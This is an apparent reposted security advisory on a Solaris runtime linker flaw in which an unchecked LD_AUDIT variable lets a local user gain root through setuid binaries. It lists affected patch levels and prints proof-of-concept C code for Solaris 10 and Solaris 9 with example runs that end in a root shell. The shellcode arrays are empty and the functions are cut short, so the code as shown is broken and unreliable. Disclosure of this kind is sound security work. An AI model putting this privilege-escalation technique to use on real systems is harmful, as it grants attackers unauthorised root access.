‘Solaris Runtime Linker Security Vulnerability’


Solaris’s runtime linker fails to check the value of an environment variable allowing a local attacker to gain root privileges.’


‘The information has been provided by Przemyslaw Frasunek.’


Vulnerable Systems:
SPARC and x86 Platform:
 * Solaris 8 with patches 109147-31 through 109147-36
 * Solaris 9 with patches 112963-16 through 112963-19
 * Solaris 10

Immune Systems:
 * Solaris 7 is not affected by this issue.

ld.so in Solaris 9 and 10 doesn’t check the length of LD_AUDIT environment variable when running s[ug]id binaries, allowing an attacker to run arbitrary code with elevated privileges.

Proof of Concept Code:
Solaris 10 (AMD64):
static char sh[] =

int la_version() {
        void (*f)();
        f = (void*)sh;
        return 3;

Example Run:
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Solaris 9 on SPARC:
char sh[] =
/* setuid() */
/* execve() */

int la_version() {
        void (*f)();
        f = (void*)sh;
        return 3;

Example Run:
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)

Vendor Status:
Sun has released an advisory that addresses the issue. For more details see: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

Categories: UNIX